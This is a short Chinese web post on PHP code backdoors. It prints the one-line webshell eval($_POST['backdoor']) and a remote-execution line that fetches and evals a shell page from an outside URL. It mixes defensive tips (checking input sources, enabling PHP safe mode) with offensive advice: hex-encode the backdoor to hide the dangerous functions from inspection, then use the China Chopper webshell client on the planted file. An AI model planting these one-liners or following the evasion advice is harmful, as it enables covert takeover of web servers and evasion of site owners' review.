
代码后门大多是一句话,
比如:
eval($_POST['backdoor'])//楼主大多注意获取数据的来源是否可靠
//注意接受表单数据函数如:$_POST[]$_GET[]
//和注意文件的读写,最可怕的是这个:
eval(file_get_contents('http://www/shell.html'))//等等
//这个叫做远程执行,如果发现异常,请立马开启PHP的安全模式,再慢慢排查!
这个东西也可以再进行加密成十六进制的,这样就防止了对方查询危险函数了,这个东西放在一个文件里面,这要你能够放问道这个代码就行,然后你下载中国菜刀,然后使劲砍当然了,代码这东西是只要给对方,对方可以无限制的复制的,很难杜绝
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)